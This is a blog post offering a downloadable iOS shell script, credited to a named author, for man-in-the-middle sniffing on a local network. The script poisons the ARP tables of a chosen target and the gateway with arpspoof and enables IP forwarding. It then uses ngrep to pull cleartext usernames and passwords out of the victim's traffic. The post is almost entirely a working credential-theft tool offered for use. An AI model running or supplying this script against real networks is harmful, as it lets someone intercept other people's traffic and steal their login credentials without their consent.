Iphone dsniff script

IOS MITM (arp poisoning) shell script that features dsniff and ettercap. This script collects all packets and parses cleartext passwords. Dsniff and ngrep are availible in Cydia repositories. You are welcome to submit bugs, feature requests and improvements.

Download: isniff

  • dsniff and ngrep must be installed
  • arp poisoning may cause overloads on large networks
  • the script must be run as root
#!/bin/sh
#iOS sniffer
#original script by http://www.hackint0sh.org/f126/79207.htm
#edited on May 7th 2011
#url http://360percents.com
#author Luka Pusic <pusic93@gmail.com>

tbroadcast=`ifconfig en0|grep broadcast|cut -d" " -f6`
tgateway=`netstat -rn|grep default|grep en0|awk '{print $2}'`
tsubnet=`ifconfig en0|grep broadcast|cut -d" " -f2|cut -d '.' -f1-3`
tlocalip=`ifconfig en0|grep broadcast|cut -d" " -f2`
tmac=`ifconfig en0|grep ether|cut -d" " -f2`

echo ""
echo "#####################"
echo "### dSniff script ###"
echo "#####################"
echo ""
echo ""
echo "Subnet    $tbroadcast"
echo "Gateway   $tgateway"
echo "Local MAC $tmac"
echo "Local IP  $tlocalip"
echo "Start sniffing? (y,n)"
read tsniff
if [ $tsniff = y ]
then
    echo "Target IP $tsubnet.? (enter a number):"
    read "thost"
    tip=`echo $tsubnet.$thost`
    echo "Save output to pcap file? (path/n)"
    read tsave
    if [ $tsave != n ]
    then
        save="-O "$tsave
    fi
    sysctl -w net.inet.ip.forwarding=1
    arpspoof -i en0 -t $tip $tgateway > /dev/null 2>&1 &
    arpspoof -i en0 -t $tgateway $tip > /dev/null 2>&1 &
    ngrep $save 'USER|PASS|user|pass|username|password' src host $tip|egrep -A1 ">|USER|PASS|user|pass|username|password"
    sleep 3
    ps aux|egrep "arpspoof|dsniff|ngrep"|grep -v egrep
    #dsniff
else
    echo ""
    echo "Clear state? (y,n)"
    read tstate
    if [ $tstate = n ]
    then
        ps aux|egrep "arpspoof|dsniff|ngrep"|grep -v egrep
        exit 0
    else
        sysctl -w net.inet.ip.forwarding=0
        killall dsniff
        killall arpspoof
        killall ngrep
        sleep 3
        ps aux|egrep "arpspoof|dsniff|ngrep"|grep -v egrep
        echo "Exit"
        echo ""
        exit 0
    fi
fi

exit 0

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>